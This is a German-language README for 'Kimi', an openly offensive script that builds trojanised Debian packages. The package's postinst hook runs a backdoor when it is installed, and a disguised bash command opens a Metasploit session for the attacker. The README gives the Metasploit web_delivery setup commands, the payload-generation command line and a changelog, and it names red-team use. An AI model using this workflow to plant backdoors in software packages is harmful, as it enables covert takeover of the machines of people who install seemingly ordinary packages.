
Skript zur Generierung bösartiger Debian-Pakete (Debian-Trojaner).
Skript zum Generieren bösartiger Debian-Pakete (debain trojans).
Kimi ist ein Name, inspiriert von "Kimimaro", einem meiner Lieblingscharaktere aus dem Anime "Naruto".
Kimi ist ein Skript, das ein bösartiges Debian-Paket für Metasploit generiert,
das aus einer Bash-Datei besteht. Die Bash-Datei wird im Verzeichnis "/usr/local/bin/" abgelegt.
Die Hintertür wird ausgeführt, sobald das Opfer versucht, das Deb-Paket zu installieren, aufgrund der postinst-Datei
Die Bash-Datei injiziert und fungiert auch wie ein Systembefehl, der, wenn vom Opfer ausgeführt,
dem Angreifer eine Session ermöglicht.
Vorteile :
-- Vollständig unabhängig. Der Benutzer muss keinen Debian-Paketersteller installieren.
-- Kann leicht mit jedem Payload-Generator integriert werden, dank der Argumentübergabe (lahm :P ich weiß)
Kimi basiert im Wesentlichen auf dem web_delivery-Modul und alles ist automatisiert.
Alles, was der Angreifer tun muss, ist die folgenden Einstellungen vorzunehmen:
Setting up Web_Delivery in msf :
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit
Generieren der bösartigen Payload :
dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0 -a i386
HINWEIS :: Dieses Projekt wurde erstellt, um mit Venom Shellcode Generator 1.0.13 integriert zu werden.
Es kann auch eigenständig verwendet werden; alles, was der Benutzer tun muss, ist, den uripath in den msf-Variablen zu ändern.
-------------------------------------------------------------------------------------
Getestet auf :
Linux Mint 17.2 Cinnamon (Ubuntu 14.04)
ParrotOS (Debian Jessie)
Kali Rolling 2.0
[Feb-22-2017]
-- Funktion zur Erstellung der "postinst"-Datei hinzugefügt, um die Ausführung der eingebetteten bösartigen Datei zu automatisieren
-- Funktion zur Generierung von RC-Dateien hinzugefügt, um die vollständige Automatisierung mit Handler-Öffnung zu ermöglichen, d.h. kein manuelles Setzen des Handlers erforderlich
-- Einige häufige Fehler behoben [besonderer Dank an r00t 3xp10it :)]
[Oct-12-2017]
-- Befehlszeilenargument (-a/--arch) hinzugefügt, um die Architektur auszuwählen (i386/amd64)
[April-24-2019] - Testversion.
-- Jetzt können benutzerdefinierte URI und LPORT eingestellt werden
-- Python-Payload wurde gemäß Python 2/3 und auch der neuesten Version von Metasploit 5 aktualisiert.
-- Der gesamte Code wurde neu implementiert, unterstützt aber weiterhin Python 2.7

Blogbeitrag : http://hackinguyz.blogspot.in/2017/03/kimi-malicious-debian-package-creator.html
YouTube-Video : https://youtu.be/Dsn6BRHy9_w
Viruatotal-Beispiel (Weil ich böswillige Nutzung dieses Skripts in freier Wildbahn gesehen habe): 7d91abb413c8cd3274f348ff12f244b9a503abfe018f138d34bbe2deab04472f
Suspicious Shell Activity [Red Team]
Twitter : @bofheaded